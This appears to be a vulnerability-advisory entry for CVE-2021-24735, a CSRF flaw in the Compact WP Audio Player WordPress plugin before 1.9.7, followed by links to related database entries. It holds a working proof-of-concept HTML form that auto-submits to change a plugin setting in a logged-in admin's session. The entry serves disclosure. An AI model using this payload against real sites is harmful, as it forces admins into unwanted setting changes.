Lucene search
Apple502jWPEX-ID:DCBCF6E7-E5B3-498B-9F5E-7896D309441FHistorySep 15, 2021 - 12:00 a.m.
Compact WP Audio Player < 1.9.7 - Setting Change via CSRF
2021-09-1500:00:00
apple502j
270
0.001 Low
EPSS
Percentile
27.6%
The plugin does not implement nonce checks, which could allow attackers to make a logged in admin change the “Disable Simultaneous Play” setting via a CSRF attack.
<form action="https://example.com/wp-admin/options-general.php?page=compact-wp-audio-player%2Fsc_audio_player.php" method="post" id="csrf">
<input name="sc_audio_player_settings" value="1" type="hidden">
<input name="sc_audio_disable_simultaneous_play" value="1" type="hidden">
</form>
<script>csrf.submit()</script>Related
wpvulndb
wpvulndb
Compact WP Audio Player < 1.9.7 - Setting Change via CSRF
2021-09-15 00:00:00
cvelist
cvelist
CVE-2021-24735 Compact WP Audio Player < 1.9.7 - Setting Change via CSRF
2021-10-18 13:46:04
cnvd
cnvd
patchstack
patchstack
prion
prion
Cross site request forgery (csrf)
2021-10-18 14:15:00
nvd
nvd
CVE-2021-24735
2021-10-18 14:15:09
cve
cve
CVE-2021-24735
2021-10-18 14:15:09